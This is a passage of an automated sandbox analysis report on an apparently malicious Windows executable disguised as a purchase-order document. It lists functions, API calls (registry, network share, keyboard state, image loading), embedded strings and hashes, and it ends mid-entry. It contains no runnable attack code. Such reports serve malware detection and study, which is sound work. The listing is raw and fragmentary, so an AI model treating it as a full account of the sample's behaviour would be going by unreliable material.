GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
GlobalLock.KERNEL32(00000000), ref: 00433523
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433533
GlobalUnlock.KERNEL32(00000000), ref: 0043353A
CloseHandle.KERNEL32(00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433541
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043354F
OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
GlobalFree.KERNEL32(00000000), ref: 0043357B
GetObjectW.GDI32(?,00000018,?), ref: 004335A6
CopyImage.USER32(?,00000000,?,?,00002000), ref: 004335DB
DeleteObject.GDI32(?), ref: 00433603
SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3969911579-0
Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA

Function 00445A77 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 73windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00445A8D
GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
__wcsicoll.LIBCMT ref: 00445AC4
__wcsicoll.LIBCMT ref: 00445AE0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D

Strings

list, xrefs: 00445B1F
largeicons, xrefs: 00445ABE
SHELLDLL_DefView, xrefs: 00445AAA
details, xrefs: 00445ADA
smallicons, xrefs: 00445AF6

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: __wcsicoll$ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 3125838495-3381328864
Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769

Function 00479921 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 314COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 004799B3, 00479C7F
Not an Object type, xrefs: 0047998B
Conversion of parameters failed, xrefs: 00479A97

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CopyVariant$ErrorLast
String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
API String ID: 2286883814-4206948668
Opcode ID: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
Opcode Fuzzy Hash: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA

Function 00475D8B Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 194COMMON

Download Yara Rule

APIs

Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E

Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984

GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
_wcscpy.LIBCMT ref: 00475F18

Strings

fixed, xrefs: 00475E4B
cdrom, xrefs: 00475E0E
removable, xrefs: 00475E2E
all, xrefs: 00475DEE
a, xrefs: 00475EBE
ramdisk, xrefs: 00475E85
unknown, xrefs: 00475EA2
network, xrefs: 00475E68
HH, xrefs: 00475D9D

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy_wcslen
String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
API String ID: 3052893215-4176887700
Opcode ID: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
Instruction ID: 30c0e749cffa51fc832ec364bb88d57898ea161693411a08ebb212f54f1b1ce2
Opcode Fuzzy Hash: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
Instruction Fuzzy Hash: E951E5716047009BC710EF51D981B9BB3D4AB85705F108C2FF948AB382D7B9DE09879B

Function 004582BF Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 165registryCOMMON

Download Yara Rule

APIs

StringFromIID.OLE32(?,?,00000003,?,?,00000000), ref: 004582E5

Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012

Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2

CoTaskMemFree.OLE32(?,00000000), ref: 00458335
RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00458351
RegQueryValueExW.ADVAPI32 ref: 00458381
CLSIDFromString.OLE32(00000000,?), ref: 004583AF
RegQueryValueExW.ADVAPI32 ref: 004583E8
LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486

Part of subcall function 00413F97: __wtof_l.LIBCMT ref: 00413FA1

RegCloseKey.ADVAPI32(?), ref: 004584BA

Strings

Version, xrefs: 004583DA
interface\, xrefs: 00458300
\TypeLib, xrefs: 00458319

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: FromQueryStringValue_wcslen$CloseFreeLoadOpenTaskType__wtof_l_wcscpy
String ID: Version$\TypeLib$interface\
API String ID: 656856066-939221531
Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A

Function 0045E62E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 155COMMON

Download Yara Rule

APIs

LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
__swprintf.LIBCMT ref: 0045E6EE
_printf.LIBCMT ref: 0045E7A9
_printf.LIBCMT ref: 0045E7D2

Strings

Error: , xrefs: 0045E76A
%s (%d) : ==> %s:%s%s, xrefs: 0045E7A4
Line %d (File "%s"):, xrefs: 0045E6E8
%s (%d) : ==> %s:, xrefs: 0045E7CD
^ ERROR, xrefs: 0045E746

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: LoadString_printf$__swprintf_wcslen
String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 3590180749-2354261254
Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A

Function 004580E1 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 136registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2

_memset.LIBCMT ref: 00458194
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
CLSIDFromString.OLE32(00000000,?), ref: 00458279
RegCloseKey.ADVAPI32(00000000), ref: 0045828F
RegCloseKey.ADVAPI32(00000000), ref: 00458296

Strings

\IPC$, xrefs: 004581B2
\CLSID, xrefs: 00458141
SOFTWARE\Classes\, xrefs: 00458123

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 2255324689-22481851
Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A

Function 004584D6 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 105registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
RegCloseKey.ADVAPI32(?), ref: 00458615

Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2

RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,000001FE,interface\), ref: 0045858A
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
__wcsicoll.LIBCMT ref: 004585D6
IIDFromString.OLE32(?,?,?,?), ref: 004585EB
RegCloseKey.ADVAPI32(?), ref: 004585F8

Strings

interface\, xrefs: 00458551
(, xrefs: 00458603
interface, xrefs: 00458509

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CloseOpen$EnumFromQueryStringValue__wcsicoll_wcslen
String ID: ($interface$interface\
API String ID: 2231185022-3327702407
Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A

Function 00436582 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 79networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 004365A5
gethostname.WSOCK32(00000100,00000100,00000101,?), ref: 004365BC
gethostbyname.WSOCK32(00000101,00000100,00000100,00000101,?), ref: 004365C6
_wcscpy.LIBCMT ref: 004365F5
WSACleanup.WSOCK32 ref: 004365FD
inet_ntoa.WSOCK32(00000100,?), ref: 00436624
_strcat.LIBCMT ref: 0043662F
_wcscpy.LIBCMT ref: 00436644
WSACleanup.WSOCK32(?,?,?,?,?,?,00000100,?), ref: 00436652
_wcscpy.LIBCMT ref: 00436666

Strings

0.0.0.0, xrefs: 004365EF

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: _wcscpy$Cleanup$Startup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 2691793716-3771769585
Opcode ID: edbc70afde67a55f4b99ee40814c5331da24f6846b253968828d225e396465d4
Instruction ID: 29d249c793a1599df1911ffab6ed89036a29d54f41df1114d8fa63e2d2305339
Opcode Fuzzy Hash: edbc70afde67a55f4b99ee40814c5331da24f6846b253968828d225e396465d4
Instruction Fuzzy Hash: 5C21D4726003016BD620FB269C42FFF33A89FD4318F54492FF64456242EABDD58983AB

Function 00416B12 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
__crt_waiting_on_module_handle.LIBCMT ref: 00416B2F

Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00416B58
GetProcAddress.KERNEL32(00411739,DecodePointer), ref: 00416B68
__lock.LIBCMT ref: 00416B8A
InterlockedIncrement.KERNEL32(00EA60FF), ref: 00416B97
__lock.LIBCMT ref: 00416BAB
___addlocaleref.LIBCMT ref: 00416BC9

Strings

DecodePointer, xrefs: 00416B60
KERNEL32.DLL, xrefs: 00416B1E, 00416B23, 00416B2E
EncodePointer, xrefs: 00416B4C

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
Instruction ID: dfb830706c011728ae11a8c0f52cb2fa371409e71f4acd403326aacb15a29bdd
Opcode Fuzzy Hash: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
Instruction Fuzzy Hash: 4E119671944701AFD720EF76C905B9EBBE0AF00714F10495FE469A6391DB78A580CB1D

Function 0044920C Relevance: 18.2, APIs: 12, Instructions: 243windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
CharNextW.USER32(?,?,?,?,0045BBB0,00000000,00000000,?,?), ref: 00449361
SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
SendMessageW.USER32(?,00000402,?), ref: 0044941C
SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
Instruction ID: cf19a455924c4199ae2d31ef2e344bdd2865620a2145bd440d1f5c61272ee54d
Opcode Fuzzy Hash: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
Instruction Fuzzy Hash: 5D81B5312083019BE720DF15DC85FBBB7E4EBD9B20F00492EFA54962C0D7B99946D766

Function 00453B94 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,?,00000000), ref: 00453C0D
SetKeyboardState.USER32(?), ref: 00453C5A
GetAsyncKeyState.USER32(000000A0), ref: 00453C82
GetKeyState.USER32(000000A0), ref: 00453C99
GetAsyncKeyState.USER32(000000A1), ref: 00453CC9
GetKeyState.USER32(000000A1), ref: 00453CDA
GetAsyncKeyState.USER32(00000011), ref: 00453D07
GetKeyState.USER32(00000011), ref: 00453D15
GetAsyncKeyState.USER32(00000012), ref: 00453D3F
GetKeyState.USER32(00000012), ref: 00453D4D
GetAsyncKeyState.USER32(0000005B), ref: 00453D77
GetKeyState.USER32(0000005B), ref: 00453D85

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
Instruction ID: 09d2c23b2f41f951af40c960ff4fa7a39ed3d74d48f5bb091813d5d41b5bf946
Opcode Fuzzy Hash: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
Instruction Fuzzy Hash: BD5108311497C42AF731EF6048217A7BBE45F52782F488D5EE9C107283E619AB0C976B

Function 00437DB1 Relevance: 18.2, APIs: 12, Instructions: 180COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00437DD7
GetWindowRect.USER32(00000000,?), ref: 00437DE9
MoveWindow.USER32(00000000,0000000A,?,?,?,00000000), ref: 00437E5C
GetDlgItem.USER32(?,00000002), ref: 00437E70
GetWindowRect.USER32(00000000,?), ref: 00437E82
MoveWindow.USER32(00000000,?,00000000,?,?,00000000), ref: 00437EDB
GetDlgItem.USER32(?,000003E9), ref: 00437EEA
GetWindowRect.USER32(00000000,?), ref: 00437EFC
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00437F46
GetDlgItem.USER32(?,000003EA), ref: 00437F55
MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 00437F6E
InvalidateRect.USER32(?,00000000,00000001), ref: 00437F78

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
Instruction ID: 6334a21bf5495bf578199e0a0c43900503e40640961724061e29feeedb49a886
Opcode Fuzzy Hash: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
Instruction Fuzzy Hash: 46511CB16083069FC318DF68DD85A2BB7E9ABC8300F144A2DF985D3391E6B4ED058B95

Function 00436879 Relevance: 18.1, APIs: 12, Instructions: 115COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 00436896
_wcscpy.LIBCMT ref: 004368A4
__wsplitpath.LIBCMT ref: 004368DA
__wsplitpath.LIBCMT ref: 00436900
_wcscpy.LIBCMT ref: 0043691E
_wcscpy.LIBCMT ref: 00436940
_wcscpy.LIBCMT ref: 00436951
_wcscat.LIBCMT ref: 0043695F
_wcscat.LIBCMT ref: 004369C6
_wcscat.LIBCMT ref: 004369FB
_wcscat.LIBCMT ref: 00436A0C

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
Instruction ID: e47e2093bf76b35e8f1fec89578fc46911e8a4506192668d3a16ce6d5165f020
